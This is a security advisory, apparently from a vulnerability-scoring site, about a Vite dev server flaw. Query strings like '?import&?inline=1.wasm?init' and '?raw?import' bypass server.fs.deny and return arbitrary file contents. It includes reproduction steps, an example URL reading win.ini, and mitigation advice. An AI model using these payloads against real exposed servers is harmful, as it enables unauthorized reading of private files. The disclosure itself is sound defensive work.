Vite has a `server.fs.deny` bypassed for `inline` and `raw` with `?import` query
The contents of arbitrary files can be returned to the browser.
Only apps explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected.
?inline&import (originally reported as ?import&?inline=1.wasm?init)?raw?import/@fs/ isn't needed to reproduce the issue for files inside the project root.
Original report (check details above for simplified cases):
The ?import&?inline=1.wasm?init ending allows attackers to read arbitrary files and returns the file content if it exists. Base64 decoding needs to be performed twice
$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev
Example full URL http://localhost:5173/@fs/C:/windows/win.ini?import&?inline=1.wasm?init
为什么是这个 VPI(可解释·实验性)
VPI 计算依据
| 影响度 | 53.00 |
| 利用信号(KEV 收录) | ×1.50 |
| VPI | 79.50 |
VPI 公式 vpi-v1
必要措施
Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.